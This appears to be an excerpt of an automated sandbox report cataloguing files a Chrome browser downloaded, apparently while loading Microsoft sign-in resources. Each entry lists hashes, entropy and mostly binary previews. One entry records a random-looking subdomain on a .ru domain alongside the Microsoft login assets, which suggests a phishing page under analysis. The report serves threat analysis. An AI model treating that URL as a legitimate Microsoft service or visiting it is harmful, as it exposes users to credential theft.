                                                                                                                                                                                                  Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61052
                                                                                                                                                                                                  Entropy (8bit):7.996159932827634
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                                                                                                                  MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                                                                                                  SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                                                                                                  SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                                                                                                  SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):1435
                                                                                                                                                                                                  Entropy (8bit):7.8613342322590265
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                                                                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):116345
                                                                                                                                                                                                  Entropy (8bit):7.997378915283506
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                                                                                                                                                  MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                                                                                                                                                  SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                                                                                                                                                  SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                                                                                                                                                  SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_510f960da65b56e0607c.js
                                                                                                                                                                                                  Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1435
                                                                                                                                                                                                  Entropy (8bit):7.8613342322590265
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                                                                  MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                                                  SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                                                  SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                                                  SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                  Entropy (8bit):4.241202481433726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                  MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                  SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                  SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                  SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):116345
                                                                                                                                                                                                  Entropy (8bit):7.997378915283506
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                                                                                                                                                  MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                                                                                                                                                  SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                                                                                                                                                  SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                                                                                                                                                  SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):89501
                                                                                                                                                                                                  Entropy (8bit):5.289893677458563
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):3452
                                                                                                                                                                                                  Entropy (8bit):5.117912766689607
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                                                                                  MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                                                                                  SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                                                                                  SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                                                                                  SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://login.live.com/Me.htm?v=3
                                                                                                                                                                                                  Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57678
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):16378
                                                                                                                                                                                                  Entropy (8bit):7.986541062710992
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:hOBEj/gTOkWow647Z1Y8hyJavTiIQslkHC:hOBKJB11Y8heariIQ8ki
                                                                                                                                                                                                  MD5:FC8A7FB6FB26ADEB81D76A33DA13B815
                                                                                                                                                                                                  SHA1:ADEF9857A4FC698836B613252AE8B1FC0EC199DE
                                                                                                                                                                                                  SHA-256:A3D6351A6E93FC23C2A3ABFFCBDC847D42B8781DBFFBCCEEF4FEF72E0D5D4A14
                                                                                                                                                                                                  SHA-512:DE70865494E5D2A32353614CC7D8305CAA83E1605F6BF03C58DD6E19D92FDE8B33B3E26ED3A65D739DEA20984130D39B6E43641B04918CC906DEC17E51B0D582
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_v20ia-gahguvu2fgvxamhg2.js
                                                                                                                                                                                                  Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                                  Entropy (8bit):4.241202481433726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                  MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                  SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                  SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                  SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                  Entropy (8bit):3.990210155325004
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                                                                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):621
                                                                                                                                                                                                  Entropy (8bit):7.673946009263606
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                                                                                                                  MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                                                                                                                  SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                                                                                                                  SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                                                                                                                  SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                                                                                                                                                  Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  URL:https://x6p2fc4fpgc2vo4ahjgnnngvjiidwpjegbrebc4yfugjayrmvlmc572.gageodeg.ru/90905003549781675088blDRrUHCFAKJQYHDPRFMEQWIYWIINXLMHIYWOKDVPQHKLW
                                                                                                                                                                                                  Preview:1
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:PNG image data, 37 x 56, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                  Entropy (8bit):4.068159130770306
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:yionv//thPlAHtn/Blhsyxl/k4E08up:6v/lhPuJl/7Tp
                                                                                                                                                                                                  MD5:31B377044E94137EB2D3BBB27083668E
                                                                                                                                                                                                  SHA1:DE54A9EE7ED5A7681D493EAB29F987BFBE8F731D
                                                                                                                                                                                                  SHA-256:6D36742C4F6CC2B181549B59A840F78D27060713DD43A8CD8A149B4AD8D148EC
                                                                                                                                                                                                  SHA-512:19151D1537E4FFC0DE00C881824D07976CD042A3D59B8FB53537E28C5BFD1D29DEDF1B57F95028E9E5766048248B06EB5BE0B501ECB749C7D576475B5C6D3348
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...%...8.............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (47520)
                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                  Size (bytes):47521
                                                                                                                                                                                                  Entropy (8bit):5.3981340461317835
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                                                                                                                                                  MD5:7C92EC9D1395055CE0405A32607C7291
                                                                                                                                                                                                  SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                                                                                                                                                  SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
